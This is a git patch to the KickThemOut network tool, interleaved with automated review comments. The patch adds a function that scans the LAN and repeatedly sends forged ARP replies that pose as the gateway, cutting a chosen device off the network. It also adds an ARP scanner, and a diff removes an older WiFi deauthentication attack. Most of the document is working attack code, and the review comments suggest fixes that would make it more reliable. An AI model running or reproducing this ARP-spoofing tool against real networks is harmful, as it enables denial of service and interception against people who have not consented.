From 7da2359a29cd2b48e761dea7375a660bb45361be Mon Sep 17 00:00:00 2001 From: k4m4 Date: Sat, 31 Dec 2016 02:41:34 +0200 Subject: [PATCH] Successful KickONEOff function --- kickthemout.py | 149 ++++++++++++++++++++++++++++++------------------- scan.py | 64 +++++++++++++++++++++ spoof.py | 59 ++++++++++---------- 3 files changed, 184 insertions(+), 88 deletions(-) create mode 100644 scan.py diff --git a/kickthemout.py b/kickthemout.py index 5acf0e3..b2ad360 100644 --- a/kickthemout.py +++ b/kickthemout.py @@ -1,19 +1,23 @@ #!/usr/bin/env python # -.- coding: utf-8 -.- # kickthemout.py +# authors: k4m4 & xdavidhu """ -Copyright (C) 2016 Nikolaos Kamarinakis (nikolaskam@gmail.com) +Copyright (C) 2016 Nikolaos Kamarinakis (nikolaskam@gmail.com) & David Schütz (xdavid@protonmail.com) See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject) """ -import time, os, sys, logging +import time, os, sys, logging, math +import scan, spoof from time import sleep +logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up scapy! +from scapy.all import * BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m' def heading(): - print(GREEN + """ + sys.stdout.write(GREEN + """ █ █▀ ▄█ ▄█▄ █ █▀ ▄▄▄▄▀ ▄ █ ▄███▄ █▀▄▀█ ████▄ ▄ ▄▄▄▄▀ █▄█ ██ █▀ ▀▄ █▄█ ▀▀▀ █ █ █ █▀ ▀ █ █ █ █ █ █ ▀▀▀ █ █▀▄ ██ █ ▀ █▀▄ █ ██▀▀█ ██▄▄ █ ▄ █ █ █ █ █ █ @@ -22,7 +26,7 @@ def heading(): ▀ ▀ ▀ ▀ ▀▀▀ """ + END + BLUE + '\n' + '{0}Kick Devices Off Your LAN ({1}KickThemOut{2}){3}'.format(YELLOW, RED, YELLOW, BLUE).center(88) + - '\n' + 'Made With <3 by: {0}Nikolaos Kamarinakis ({1}k4m4{2}){3}'.format(YELLOW, RED, YELLOW, BLUE).center(87) + + '\n' + 'Made With <3 by: {0}Nikolaos Kamarinakis ({1}k4m4{2}) & {0}David Schütz ({1}xdavidhu{2}){3}'.format(YELLOW, RED, YELLOW, BLUE).center(67) + '\n' + 'Version: {0}0.1{1}'.format(YELLOW, END).center(77)) def optionBanner(): 
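Review bot: `from scapy.all import *` (added right after `import scan, spoof`) pulls scapy's entire namespace into kickthemout.py, which makes it hard to see which names are local and lets scapy silently shadow them; the names this patch actually uses later (`sr1`, `IP`, `ICMP`, `get_if_hwaddr`) could be imported explicitly, as spoof.py already does with `from scapy.all import (get_if_hwaddr, ...)`. The `logging.getLogger("scapy.runtime").setLevel(logging.ERROR)` line sits between two import statements, presumably because scapy logs at import time and the level must be set before `from scapy.all import *` runs; a comment saying exactly that, e.g. `# must run before scapy is imported: scapy emits warnings at import time`, would stop a future cleanup from moving it below the imports and reintroducing the noise. `import time, os, sys, logging, math` and `import scan, spoof` would also read better as one import per line.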
@@ -35,8 +39,44 @@ def optionBanner():
 sleep(0.2)
 print('\n\t{0}[{1}E{2}]{3} Exit KickThemOut\n').format(YELLOW, RED, YELLOW, WHITE)

+def scanNetwork():
+ global hostsList
+ hostsList = scan.scanNetwork()
+
 def kickoneoff():
- print('kickoneoff')
+ os.system("clear||cls")
+
+ print("\n{0}kickONEOff{1} selected...{2}\n").format(RED, GREEN, END)
+ scanNetwork()
+ print "Online IPs: "
+
+ for i in range(len(onlineIPs)):
+ print(" ["+str(i)+"] {0}"+str(onlineIPs[i])+"{1}\n").format(RED, END)
+
+ choice = int(raw_input("IP of the target: ")) # TODO: try, except
+ one_target_ip = onlineIPs[choice]
+ one_target_mac = ""
+ for host in hostsList:
+ if host[0] == one_target_ip:
+ one_target_mac = host[1]
+ if one_target_mac == "":
+ print("\nIP address is not up. Please try again.")
+ return
+
+ print("\n{0}Target mac => '{1}" + one_target_mac + "{2}'{3}\n").format(GREEN, RED, GREEN, END)
+ print("{0}Spoofing started... {1}\n").format(GREEN, END)
+ try:
+ while True:
+ spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, one_target_ip, one_target_mac)
+ time.sleep(15)
+ except KeyboardInterrupt:
+ print("\n{0}Re-arping{1} target...{2}").format(RED, GREEN, END)
+ rearp = 1
+ while rearp != 10:
+ spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, one_target_ip, one_target_mac)
+ rearp = rearp + 1
+ time.sleep(0.5)
+ print("\n{0}Done.{1}").format(GREEN, END)

 def kicksomeoff():
 print('kicksomeoff')
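Review bot: `onlineIPs` is never rebuilt after `scanNetwork()` refreshes `hostsList` at the top of `kickoneoff`, so the numbered menu shows the list built at startup while the `one_target_mac` lookup a few lines below runs against the fresh scan; any host that appeared or disappeared between the two makes the chosen index, `one_target_ip` and `one_target_mac` disagree. Deriving the menu from the current scan, `onlineIPs = [host[0] for host in hostsList]` right after `scanNetwork()`, keeps both in step. The `choice = int(raw_input("IP of the target: "))` line (the TODO already notes the missing `try`/`except` for a non-numeric answer) also needs a range check, because `onlineIPs[choice]` raises IndexError for an out-of-range number and the function currently has no path that reports that. In the `except KeyboardInterrupt:` branch `rearp = 1` with `while rearp != 10` sends nine restoring packets rather than the ten the loop suggests, and a second Ctrl-C inside that loop abandons the restore halfway; `for _ in range(10):` with the restore guarded so an interrupt cannot skip it would make the cleanup of the target's ARP cache reliable.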
@@ -44,71 +84,56 @@ def kicksomeoff():
 def kickalloff():
 print('kickalloff')
-"""
-def deauth_attack(iface, bssid):
+def getDefaultInterface():
+ def long2net(arg):
+ if (arg <= 0 or arg >= 0xFFFFFFFF):
+ raise ValueError("illegal netmask value", hex(arg))
+ return 32 - int(round(math.log(0xFFFFFFFF - arg, 2)))
- client = 'FF:FF:FF:FF:FF:FF'
+ def to_CIDR_notation(bytes_network, bytes_netmask):
+ network = scapy.utils.ltoa(bytes_network)
+ netmask = long2net(bytes_netmask)
+ net = "%s/%s" % (network, netmask)
+ if netmask < 16:
+ return None
- conf.iface = iface
- conf.verb = 0
- packet = RadioTap()/Dot11(type=0,subtype=12,addr1=client,
- addr2=bssid,addr3=bssid)/Dot11Deauth(reason=7)
+ return net
- print('\nChoose option from menu:\n')
- print('\t{0}[{1}1{2}]{3} Kick Once').format(YELLOW, RED, YELLOW, WHITE)
- sleep(0.2)
- print('\t{0}[{1}2{2}]{3} Keep Kicking').format(YELLOW, RED, YELLOW, WHITE)
- sleep(0.2)
+ for network, netmask, _, interface, address in scapy.config.conf.route.routes:
- choice = None
- while choice == None:
- header = ('\n{0}kickthemout{1}> '.format(BLUE, WHITE))
- choice = raw_input(header)
- if choice == '1':
- pcounter_header = ('{0}kickthemout{1}> numofpackets: '.format(BLUE, WHITE))
- pcounter = raw_input(pcounter_header)
- print(pcounter) # {TESTING}
- packets_sent = 0
- for i in range(int(pcounter)):
- sendp(packet)
- packets_sent += 1
- print 'Deauth sent via: ' + iface + ' to BSSID: ' + bssid + '.\nPackets sent: ' + str(packets_sent)
- sleep(2)
- elif choice == '2':
- time_header = ('{0}kickthemout{1}> keepkickingfor(mins): '.format(BLUE, WHITE))
- attack_time = float(raw_input(time_header))
- start = time.time()
- packets_sent = 0
- while (time.time() - start) != attack_time:
- sendp(packet)
- packets_sent += 1
- print 'Deauth sent via: ' + iface + ' to BSSID: ' + bssid + '.\nPackets sent: ' + str(packets_sent)
- sleep(2)
- else:
- choice = None
- print('*INVALID OPTION*') # {TESTING}
-"""
+ # skip loopback network and default gw
+ if network == 0 or interface == 'lo' or address == '127.0.0.1' or address == '0.0.0.0':
+ continue
+
+ if netmask <= 0 or netmask == 0xFFFFFFFF:
+ continue
+
+ net = to_CIDR_notation(network, netmask)
+
+ if interface != scapy.config.conf.iface:
+ continue
+
+ if net:
+ return interface
+
+def getGatewayIP():
+ getGateway_p = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=False)
+ return getGateway_p.src
 def main():
 heading()
+ print("\n{0}Using interface '{1}"+defaultInterface+"{2}' with mac address '{3}"+defaultInterfaceMac+"{4}'.\nGateway IP: '{5}"
+ + defaultGatewayIP + "{6}'. {7}" + str(len(hostsList)) + "{8} hosts are up.{9}").format(GREEN, RED, GREEN, RED, GREEN, RED, GREEN, RED, GREEN, END)
+
 try:
- # CHECK FOR WIRELESS CARD
- iface_header = ('\n{0}kickthemout{1}> interface: '.format(BLUE, WHITE))
- iface = raw_input(iface_header)
-
- # SCAN (AIRODUMP-NG) & PARSE (BSSIDs)
- # ...
-
- bssid_header = ('{0}kickthemout{1}> bssid: '.format(BLUE, WHITE))
- bssid = raw_input(bssid_header) # {TESTING}
 while True:
 optionBanner()
- header = ('{0}kickthemout{1}> '.format(BLUE, WHITE))
+ header = ('{0}kickthemout{1}> {2}'.format(BLUE, WHITE, END))
 choice = raw_input(header)
 if choice.upper() == 'E' or choice.upper() == 'EXIT':
@@ -131,8 +156,18 @@ def main():

 except KeyboardInterrupt:
 print('\nThanks for dropping by.'
- '\nCatch ya later!')
-
+ '\nCatch ya later!{0}').format(END)

 if __name__ == '__main__':
+
+ defaultInterface = getDefaultInterface()
+ defaultGatewayIP = getGatewayIP()
+ defaultInterfaceMac = get_if_hwaddr(defaultInterface)
+ scanNetwork()
+ onlineIPs = []
+ for host in hostsList:
+ onlineIPs.append(host[0])
+ if host[0] == defaultGatewayIP:
+ defaultGatewayMac = host[1]
+
 main()
diff --git a/scan.py b/scan.py
new file mode 100644
index 0000000..796d632
--- /dev/null
+++ b/scan.py
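Review bot: `getGatewayIP` dereferences `getGateway_p.src` without checking the result of `sr1`, which returns `None` when no reply arrives (no upstream connectivity, `google.com` failing to resolve, or a gateway that does not answer with ICMP time-exceeded), so startup dies with an AttributeError instead of a message; a guard such as `if getGateway_p is None: sys.exit("Could not determine the gateway IP")` is needed, and scapy's own routing table (`scapy.config.conf.route.route("0.0.0.0")` returns `(interface, source_ip, gateway)`) would give the same answer without sending traffic to an external host or depending on DNS. `getDefaultInterface` repeats `long2net`, `to_CIDR_notation` and the whole route loop that scan.py adds in this same commit; the route walk could be factored into one helper in scan.py that both callers use, and it returns `None` when no route matches, which `get_if_hwaddr(defaultInterface)` in the `__main__` block then turns into an unhelpful failure the same startup guard could cover. Both functions reference the bare `scapy` package (`scapy.utils.ltoa`, `scapy.config.conf`) although kickthemout.py only has `from scapy.all import *`; whether that binds the name `scapy` depends on scapy's `__all__`, so an explicit `import scapy.config, scapy.utils` would remove the doubt.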
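Review bot: `defaultGatewayMac` is only assigned inside the `for host in hostsList:` loop when the gateway IP shows up in the ARP scan; if it does not, the name is never bound and the restore loop in `kickoneoff` (its `except KeyboardInterrupt:` branch) fails with a NameError after the spoofing has already run, leaving the target's ARP cache unrestored. Initialise it before the loop, `defaultGatewayMac = None`, and abort at startup with a clear message when it is still `None` afterwards, since the tool cannot undo its own changes without it. Building `onlineIPs` here while `kickoneoff` re-scans `hostsList` later also means the two lists drift apart; deriving `onlineIPs` from `hostsList` at the point of use avoids keeping a second copy of the same data as module-level state.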
@@ -0,0 +1,64 @@
+#!/usr/bin/env python
+# -.- coding: utf-8 -.-
+# scan.py
+# author: Benedikt Waldvogel
+# edited by: k4m4 & xdavidhu
+
+import scapy.config, scapy.layers.l2, scapy.route, socket, math, errno
+
+def scanNetwork():
+
+ def long2net(arg):
+ if (arg <= 0 or arg >= 0xFFFFFFFF):
+ raise ValueError("illegal netmask value", hex(arg))
+ return 32 - int(round(math.log(0xFFFFFFFF - arg, 2)))
+
+
+ def to_CIDR_notation(bytes_network, bytes_netmask):
+ network = scapy.utils.ltoa(bytes_network)
+ netmask = long2net(bytes_netmask)
+ net = "%s/%s" % (network, netmask)
+ if netmask < 16:
+ return None
+
+ return net
+
+
+ def scan_and_print_neighbors(net, interface, timeout=1):
+ hostsList = []
+ try:
+ ans, unans = scapy.layers.l2.arping(net, iface=interface, timeout=timeout, verbose=False)
+ for s, r in ans.res:
+ mac = r.sprintf("%Ether.src%")
+ ip = r.sprintf("%ARP.psrc%")
+ line = r.sprintf("%Ether.src% %ARP.psrc%")
+ hostsList.append([ip, mac])
+ try:
+ hostname = socket.gethostbyaddr(r.psrc)
+ line += "," + hostname[0]
+ except socket.herror:
+ pass
+ except socket.error as e:
+ if e.errno == errno.EPERM: # Operation not permitted
+ exit()
+ else:
+ raise
+ return hostsList
+
+ for network, netmask, _, interface, address in scapy.config.conf.route.routes:
+
+ # skip loopback network and default gw
+ if network == 0 or interface == 'lo' or address == '127.0.0.1' or address == '0.0.0.0':
+ continue
+
+ if netmask <= 0 or netmask == 0xFFFFFFFF:
+ continue
+
+ net = to_CIDR_notation(network, netmask)
+
+ if interface != scapy.config.conf.iface:
+ # see http://trac.secdev.org/scapy/ticket/537
+ continue
+
+ if net:
+ return scan_and_print_neighbors(net, interface)
diff --git a/spoof.py b/spoof.py
index f001ff0..2d6c711 100644
--- a/spoof.py
+++ b/spoof.py
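Review bot: `scanNetwork` falls off the end of the `for` loop and returns `None` when no route passes the filters (for instance when `to_CIDR_notation` returns `None` because the prefix is shorter than /16), and kickthemout.py then calls `len(hostsList)` on that `None`; an explicit `return []` after the loop keeps the contract "list of `[ip, mac]` pairs" in every case. In `scan_and_print_neighbors` the `line` string and the `socket.gethostbyaddr(r.psrc)` reverse lookup are built but never used (presumably inherited from the original script, which printed them), so each discovered host costs a blocking DNS query for nothing; either drop the lookup or return the hostname alongside `[ip, mac]`. `scapy.utils.ltoa` is called but `scapy.utils` is not in the import line; it may be reachable through the other scapy submodules' own imports, but `import scapy.utils` should be explicit. `exit()` on `errno.EPERM` ends the process with no explanation; `sys.exit("arping needs raw-socket privileges")` (with `sys` imported) tells the user why, and a docstring should state that the function scans only the network attached to `scapy.config.conf.iface` and returns the `[ip, mac]` list.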
@@ -1,3 +1,13 @@
+#!/usr/bin/env python
+# -.- coding: utf-8 -.-
+# spoof.py
+# authors: k4m4 & xdavidhu
+
+"""
+Copyright (C) 2016 Nikolaos Kamarinakis (nikolaskam@gmail.com) & David Schütz (xdavid@protonmail.com)
+See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject)
+"""
+
 import sys
 from scapy.all import (
 get_if_hwaddr,
@@ -7,40 +17,27 @@ from scapy.all import (
 sendp
 )

-try:
- my_mac = sys.argv[1]
- interface = sys.argv[2]
- my_ip = sys.argv[3]
- target_ip = sys.argv[4]
- target_mac = sys.argv[5]
-except:
- print "Usage: sudo python spoof.py [MY_MAC] [IFACE] [GATEWAY_IP] [TARGET_IP] [TARGET_MAC]"
- exit()
+def sendPacket(my_mac, gateway_ip, target_ip, target_mac):

-ether = Ether()
-ether.src = my_mac # Default: network card mac
+ ether = Ether()
+ ether.src = my_mac

-arp = ARP()
-arp.psrc = my_ip
-arp.hwsrc = my_mac
+ arp = ARP()
+ arp.psrc = gateway_ip
+ arp.hwsrc = my_mac

-arp = arp
-arp.pdst = target_ip # Default: 0.0.0.0
-arp.hwdst = target_mac # Default: 00:00:00:00:00:00
+ arp = arp
+ arp.pdst = target_ip
+ arp.hwdst = target_mac

-ether = ether
-ether.src = my_mac
-ether.dst = target_mac # Default: ff:ff:ff:ff:ff:f
+ ether = ether
+ ether.src = my_mac
+ ether.dst = target_mac

-def craftRequestPkt():
- packet = ether/arp
- sendp(x=packet, inter=1, count=1000)
-
-def craftReplyPkt():
 arp.op = 2
- packet = ether/arp
- sendp(x=packet, inter=1, count=1000)
-
-
-if __name__ == '__main__':
- craftReplyPkt()
+
+ def broadcastPacket():
+ packet = ether/arp
+ sendp(x=packet, verbose=False)
+
+ broadcastPacket()
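Review bot: `arp = arp` and `ether = ether` inside `sendPacket` are no-op self-assignments carried over from the old script, and `ether.src = my_mac` is assigned twice, so the field setup can be collapsed into the `Ether(...)` and `ARP(...)` constructors' keyword arguments in two statements. The nested `broadcastPacket` is defined and called exactly once and does not broadcast anything (the frame is addressed to `target_mac`), so the misleading name and the extra scope should go; `sendp(x=ether/arp, verbose=False)` inline says the same thing. `import sys` in the context above appears to have no remaining user now that the `sys.argv` parsing is removed, as far as the visible parts of spoof.py show. A docstring is also missing; `"""Send one ARP reply (op=2) claiming gateway_ip is at my_mac, addressed to target_mac/target_ip."""` documents what kickthemout.py relies on.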